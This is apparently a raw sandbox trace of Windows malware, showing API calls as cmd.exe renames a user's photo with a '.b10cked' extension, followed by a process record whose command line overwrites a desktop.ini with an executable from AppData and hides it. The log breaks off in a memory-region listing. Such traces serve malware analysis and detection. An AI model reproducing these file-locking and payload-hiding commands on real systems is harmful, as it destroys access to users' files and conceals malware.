[0143.549] RegCloseKey (hKey=0x40) returned 0x0 [0143.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec14 | out: phkResult=0x2eec14*=0x40) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x0, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x9, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegCloseKey (hKey=0x40) returned 0x0 [0143.550] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.550] srand (_Seed=0x5b886372) [0143.550] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" [0143.550] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" [0143.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.550] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.550] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.550] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.551] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.551] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.551] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.551] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.551] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.551] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.551] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.551] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.551] GetEnvironmentStringsW () returned 0x4b22a0* [0143.551] FreeEnvironmentStringsW (penv=0x4b22a0) returned 1 [0143.551] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.551] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.551] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.551] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.551] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.551] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.551] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.551] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.551] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9e0, lpFilePart=0x2ef9dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9dc*="Desktop") returned 0x18 [0143.551] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef75c | out: lpFindFileData=0x2ef75c) returned 0x4affe0 [0143.552] FindClose (in: hFindFile=0x4affe0 | out: hFindFile=0x4affe0) returned 1 [0143.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.553] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.553] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.553] GetEnvironmentStringsW () returned 0x4b2ac0* [0143.553] FreeEnvironmentStringsW (penv=0x4b2ac0) returned 1 [0143.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.553] GetConsoleOutputCP () returned 0x1b5 [0143.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.554] GetUserDefaultLCID () returned 0x409 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efb20, cchData=128 | out: lpLCData="0") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efb20, cchData=128 | out: lpLCData="0") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efb20, cchData=128 | out: lpLCData="1") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.555] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.556] GetConsoleTitleW (in: lpConsoleTitle=0x4a08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.556] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.557] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.557] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.557] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.557] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.557] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.557] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.557] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.576] GetConsoleTitleW (in: lpConsoleTitle=0x2ef818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.576] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.577] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.577] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.577] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.577] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.577] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.577] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.577] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.577] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.577] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.577] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.577] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.577] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.577] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef5d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef5cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef5cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.580] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.580] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.580] _wcsicmp (_String1="isdKb.jpg", _String2=".") returned 59 [0143.580] _wcsicmp (_String1="isdKb.jpg", _String2="..") returned 59 [0143.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.581] SetErrorMode (uMode=0x0) returned 0x0 [0143.581] SetErrorMode (uMode=0x1) returned 0x0 [0143.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2eef5c, lpFilePart=0x2eef44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x2eef44*="isdKb.jpg") returned 0x23 [0143.581] SetErrorMode (uMode=0x0) returned 0x1 [0143.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.581] _wcsicmp (_String1="isdKb.jpg", _String2=".") returned 59 [0143.581] _wcsicmp (_String1="isdKb.jpg", _String2="..") returned 59 [0143.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.581] SetErrorMode (uMode=0x0) returned 0x0 [0143.581] SetErrorMode (uMode=0x1) returned 0x0 [0143.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2ef3d8, lpFilePart=0x2ef170 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x2ef170*="isdKb.jpg") returned 0x23 [0143.581] SetErrorMode (uMode=0x0) returned 0x1 [0143.582] SetErrorMode (uMode=0x0) returned 0x0 [0143.582] SetErrorMode (uMode=0x1) returned 0x0 [0143.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2ef5e0, lpFilePart=0x2ef170 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", lpFilePart=0x2ef170*="isdKb.jpg.b10cked") returned 0x2b [0143.582] SetErrorMode (uMode=0x0) returned 0x1 [0143.582] SetLastError (dwErrCode=0x0) [0143.582] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg.b10cked")) returned 0xffffffff [0143.582] GetLastError () returned 0x2 [0143.582] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", fInfoLevelId=0x1, lpFindFileData=0x2eeaec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaec) returned 0x4b2198 [0143.582] FindNextFileW (in: hFindFile=0x4b2198, lpFindFileData=0x2eeaec | out: lpFindFileData=0x2eeaec) returned 0 [0143.583] GetLastError () returned 0x12 [0143.583] FindClose (in: hFindFile=0x4b2198 | out: hFindFile=0x4b2198) returned 1 [0143.583] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", fInfoLevelId=0x1, lpFindFileData=0x4b1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1ac8) returned 0x4b2198 [0143.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2eed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked", lpFilePart=0x0) returned 0x2b [0143.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", nBufferLength=0x104, lpBuffer=0x2eed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpFilePart=0x0) returned 0x23 [0143.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg")) returned 0x20 [0143.584] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.584] FindClose (in: hFindFile=0x4b2198 | out: hFindFile=0x4b2198) returned 1 [0143.584] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eed38 | out: _Buffer=" 1") returned 9 [0143.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.584] GetFileType (hFile=0x7) returned 0x2 [0143.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eecc4 | out: lpMode=0x2eecc4) returned 1 [0143.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.872] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eecf8 | out: lpConsoleScreenBufferInfo=0x2eecf8) returned 1 [0143.873] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.873] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eed38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.873] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eed1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eed1c*=0x1a) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.873] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.873] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.874] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.874] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.874] SetConsoleInputExeNameW () returned 0x1 [0143.874] GetConsoleOutputCP () returned 0x1b5 [0143.874] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.874] exit (_Code=0) Process: id = "187" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16671 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16672 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16673 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16674 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16675 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16676 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16677 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16678 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16679 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 16680 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16787 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16788 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16789 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16790 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 16791 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 16792 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16793 start_va = 0x75540000 end_va 